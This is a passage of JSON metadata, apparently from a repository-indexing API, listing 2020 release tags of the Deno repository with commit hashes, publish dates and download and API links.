denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2/manifests"},{"name":"std/0.63.0","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.63.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.63.0/manifests"},{"name":"v1.2.1","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.1/manifests"},{"name":"std/0.62.0","sha":"25a0ad3e16e767d58b1315e9d12a236ea36c5998","kind":"commit","published_at":"2020-07-24T10:32:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.62.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.62.0/manifests"},{"name":"v1.2.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.0/manifests"},{"name":"std/0.61.0","sha":"6af5149ea3d9b0accf7122073abbf852e355846f","kind":"commit","published_at":"2020-07-13T17:00:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.61.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.61.0/manifests"},{"name":"v1.1.3","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.3/manifests"},{"name":"std/0.60.0","sha":"be07aaed84946a13ec514c39606e2030e47af73f","kind":"commit","published_at":"2020-07-03T19:35:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.60.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.60.0/manifests"},{"name":"v1.1.2","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.2/manifests"},{"name":"std/0.59.0","sha":"5bc130be2722fe54d42004cc48536b390437ede3","kind":"commit","published_at":"2020-06-26T21:45:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.59.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.59.0/manifests"},{"name":"v1.1.1","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.1/manifests"},{"name":"std/0.58.0","sha":"bdf2d26ba1879b2ebeffd4b3a52e23e9254d4f05","kind":"commit","published_at":"2020-06-19T18:48:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.58.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.58.0","tag_url":"